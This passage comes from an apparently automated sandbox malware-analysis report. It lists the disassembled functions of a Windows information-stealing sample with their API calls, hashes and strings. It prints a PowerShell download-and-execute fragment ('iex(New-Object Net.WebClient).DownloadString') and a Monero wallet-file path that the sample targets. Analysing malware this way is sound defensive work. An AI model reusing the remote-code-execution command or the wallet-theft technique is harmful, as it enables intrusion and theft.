                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: 79f3e6a64ad31ca7adbdf91ac883718ae6a83753f634fbd715f7a3b2ad8fd640
                          • Instruction ID: 9a95b52d523c6463e0ecba1c03b3eed4da58b583dc31fff527696cd2b9e4f2c8
                          • Opcode Fuzzy Hash: 79f3e6a64ad31ca7adbdf91ac883718ae6a83753f634fbd715f7a3b2ad8fd640
                          • Instruction Fuzzy Hash: 2821F8B1A0022CABDB24DF54DC85FE9B3B8FB48700F10C598E649A6140DF756A85CFA4
                          Function 00DF7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF76A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF76AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0082BC68,00000000,00020119,00000000), ref: 00DF76DD
                          • RegQueryValueExA.ADVAPI32(00000000,00840468,00000000,00000000,?,000000FF), ref: 00DF76FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00DF7708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 08b1593b9e4dbb3d64552687d71c5fd4b5afbfae09fe65dd34e272f1fc9ffecd
                          • Instruction ID: 3b050dab3a5dd4ec0e9a34dacac8663191723e5988f8ddbd420573f6f31512cd
                          • Opcode Fuzzy Hash: 08b1593b9e4dbb3d64552687d71c5fd4b5afbfae09fe65dd34e272f1fc9ffecd
                          • Instruction Fuzzy Hash: AE0144B5B04209FBD720EFE4DC49FBA77B8EB44701F208454FB45D7584DAB599008B60
                          Function 00DF7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0082BC68,00000000,00020119,00DF76B9), ref: 00DF775B
                          • RegQueryValueExA.ADVAPI32(00DF76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00DF777A
                          • RegCloseKey.ADVAPI32(00DF76B9), ref: 00DF7784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: b5029743c85a254cb23aeb82103525efad0d4342354887d0fcf8c541745bfd02
                          • Instruction ID: cad6b0de3a6ae4babb2dd58647a596255922eca599a1f25e7c66af966ef3a1bc
                          • Opcode Fuzzy Hash: b5029743c85a254cb23aeb82103525efad0d4342354887d0fcf8c541745bfd02
                          • Instruction Fuzzy Hash: 550144B5B40308FBDB20DFE0DC49FAEB7B8EB44701F108555FA45A7285DAB556008B61
                          Function 00DE99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                          • LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: e27f54c9dc0eef19010f45e5a9b7469a1a92a8343575b1238f24c3092bd8c932
                          • Instruction ID: 629248a6fa37975576a41ee3cefeb05bd4120b76f05b2f5e3e9a103db64f90c4
                          • Opcode Fuzzy Hash: e27f54c9dc0eef19010f45e5a9b7469a1a92a8343575b1238f24c3092bd8c932
                          • Instruction Fuzzy Hash: 15313EB4A00209EFDB24DFA5D995BAEB7B5FF48340F108168E905A7284D779A941CFB0
                          Function 00DF4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,00840720), ref: 00DF47DB
                            • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF4801
                          • lstrcat.KERNEL32(?,?), ref: 00DF4820
                          • lstrcat.KERNEL32(?,?), ref: 00DF4834
                          • lstrcat.KERNEL32(?,0082A4C8), ref: 00DF4847
                          • lstrcat.KERNEL32(?,?), ref: 00DF485B
                          • lstrcat.KERNEL32(?,0083F2C8), ref: 00DF486F
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DF8D90: GetFileAttributesA.KERNEL32(00000000,?,00DE1B54,?,?,00E0564C,?,?,00E00E1F), ref: 00DF8D9F
                            • Part of subcall function 00DF4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00DF4580
                            • Part of subcall function 00DF4570: RtlAllocateHeap.NTDLL(00000000), ref: 00DF4587
                            • Part of subcall function 00DF4570: wsprintfA.USER32 ref: 00DF45A6
                            • Part of subcall function 00DF4570: FindFirstFileA.KERNEL32(?,?), ref: 00DF45BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: b145e29ee0494bad856f921c5069ef279bf90adcc76f006b6251922bc4e9095d
                          • Instruction ID: a8196d71f20cacd9a972eb84cf7e8b15ab931e3127ee56da502ef8dd83bfeb9b
                          • Opcode Fuzzy Hash: b145e29ee0494bad856f921c5069ef279bf90adcc76f006b6251922bc4e9095d
                          • Instruction Fuzzy Hash: 3E3152B6A0021C97CB20FBA0DC85EFD7378AB58704F408589F35996085EEB5D7898FB5
                          Function 00DF2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,00838998,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                            • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                            • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                            • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00DF2D85
                          Strings
                          • ')", xrefs: 00DF2CB3
                          • <, xrefs: 00DF2D39
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00DF2D04
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00DF2CC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: e9d3c19a435ffc76d339044fa4f2281d63dbc96e7c3ff57cac825ea92bbd528f
                          • Instruction ID: 601b1ab582eda737c4b1be2f94d404c453d58ce39ac5b4f53f90c65153a3ea3e
                          • Opcode Fuzzy Hash: e9d3c19a435ffc76d339044fa4f2281d63dbc96e7c3ff57cac825ea92bbd528f
                          • Instruction Fuzzy Hash: B141DAB180021C9ADB14EBA4C892BFDB774EF10340F55C029E60AB7195DFB46A4ACFB1
                          Function 00DE9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                          Download Yara Rule
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00DE9F41
                            • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: 40692de965b13a369c585283992432d8a5645db0f086b06836a747dd90362723
                          • Instruction ID: 4ba48c3d5070fa1559d82c7e28588712a780276f7f343744f2f267bd889ca6bf
                          • Opcode Fuzzy Hash: 40692de965b13a369c585283992432d8a5645db0f086b06836a747dd90362723
                          • Instruction Fuzzy Hash: E1610A71A002489BDB24EFA9CC96FED7775EF44340F048118FA0A6B195DB74AA45CB72
                          Function 00DF40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,0083F088,00000000,00020119,?), ref: 00DF40F4
                          • RegQueryValueExA.ADVAPI32(?,00840690,00000000,00000000,00000000,000000FF), ref: 00DF4118
                          • RegCloseKey.ADVAPI32(?), ref: 00DF4122
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF4147
                          • lstrcat.KERNEL32(?,008407C8), ref: 00DF415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: f5d49a0ad31930404b1991ba4d89527a67c27b414c132c94e2a6b8c43dbf0264
                          • Instruction ID: 802eb676c489b45dc280f04f48f239d8374b20b1c917d61607c1c4ab0f3727f6
                          • Opcode Fuzzy Hash: f5d49a0ad31930404b1991ba4d89527a67c27b414c132c94e2a6b8c43dbf0264
                          • Instruction Fuzzy Hash: 264146B6A00108ABDB34EFA0DC46FFE737DAB88300F508558B75557185EE759B888BB1
                          Function 00DF6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00DF696C
                          • sscanf.NTDLL ref: 00DF6999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00DF69B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00DF69C0
                          • ExitProcess.KERNEL32 ref: 00DF69DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: d10e4ff9dc64320d05a306bad998d112f535d7f6ff31e9231781dfaa829ce5e4
                          • Instruction ID: e94acc2b30b8bcef802bbdfbf79679f3e65cb68ea248a28e15d8aba097dd8286
                          • Opcode Fuzzy Hash: d10e4ff9dc64320d05a306bad998d112f535d7f6ff31e9231781dfaa829ce5e4
                          • Instruction Fuzzy Hash: 2F21EAB5D0020CABCF14EFE8D945AEEB7B5FF48300F14852AE506E3644EB759605CB69
                          Function 00DF7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0082BBC0,00000000,00020119,?), ref: 00DF7E5E
                          • RegQueryValueExA.ADVAPI32(?,0083F028,00000000,00000000,000000FF,000000FF), ref: 00DF7E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00DF7E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 9dd158a9868921dcd85eb946cb9ac7cf8095da07b40a628d6fb34bc6cc6f8a5d
                          • Instruction ID: 8cfc7337b9b1ccb971056ab8c4b1b9f00ede266f596c0c127521baf1a729f79a
                          • Opcode Fuzzy Hash: 9dd158a9868921dcd85eb946cb9ac7cf8095da07b40a628d6fb34bc6cc6f8a5d
                          • Instruction Fuzzy Hash: 8C118FB1A44209EBD724CF94DD4AFBBBBB8FB44710F20811AF755A7684DB7958008BA0
                          Function 00DF9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
